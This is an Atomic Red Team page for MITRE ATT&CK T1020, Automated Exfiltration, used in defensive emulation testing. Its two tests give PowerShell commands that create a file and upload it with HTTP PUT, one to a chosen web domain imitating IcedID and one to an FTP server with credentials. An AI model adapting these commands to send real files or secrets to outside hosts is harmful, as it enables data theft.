# T1020 - Automated Exfiltration

## Description from ATT&CK

> Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020)
> 
> When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).

[Source](https://attack.mitre.org/techniques/T1020)

## Atomic Tests

- [Atomic Test #1: IcedID Botnet HTTP PUT](#atomic-test-1-icedid-botnet-http-put)
- [Atomic Test #2: Exfiltration via Encrypted FTP](#atomic-test-2-exfiltration-via-encrypted-ftp)

### Atomic Test #1: IcedID Botnet HTTP PUT

Creates a text file
Tries to upload to a server via HTTP PUT method with ContentType Header
Deletes a created file

**Supported Platforms:** Windows

**auto_generated_guid:** `9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file | Exfiltration File | string | C:&#92;temp&#92;T1020_exfilFile.txt|
| domain | Destination Domain | url | https://google.com|

#### Attack Commands: Run with `powershell`!

```powershell
$fileName = "#{file}"
$url = "#{domain}"
$file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"
$contentType = "application/octet-stream"
try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}
```

#### Cleanup Commands

```powershell
$fileName = "#{file}"
Remove-Item -Path $fileName -ErrorAction Ignore
```
### Atomic Test #2: Exfiltration via Encrypted FTP

Simulates encrypted file transfer to an FTP server. For testing purposes, a free FTP testing portal is available at https://sftpcloud.io/tools/free-ftp-server, providing a temporary FTP server for 60 minutes. Use this service responsibly for testing and validation only.

**Supported Platforms:** Windows

**auto_generated_guid:** `5b380e96-b0ef-4072-8a8e-f194cb9eb9ac`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sampleFile | Path of the sample file to exfiltrate. | String | C:&#92;temp&#92;T1020__FTP_sample.txt|
| ftpServer | FTP server URL. | Url | ftp://example.com|
| credentials | FTP server credentials. | String | [user:password]|

#### Attack Commands: Run with `powershell`!

```powershell
$sampleData = "Sample data for exfiltration test"
Set-Content -Path "#{sampleFile}" -Value $sampleData
$ftpUrl = "#{ftpServer}"
$creds = Get-Credential -Credential "#{credentials}"
Invoke-WebRequest -Uri $ftpUrl -Method Put -InFile "#{sampleFile}" -Credential $creds
```

#### Cleanup Commands

```powershell
Remove-Item -Path "#{sampleFile}" -ErrorAction Ignore
```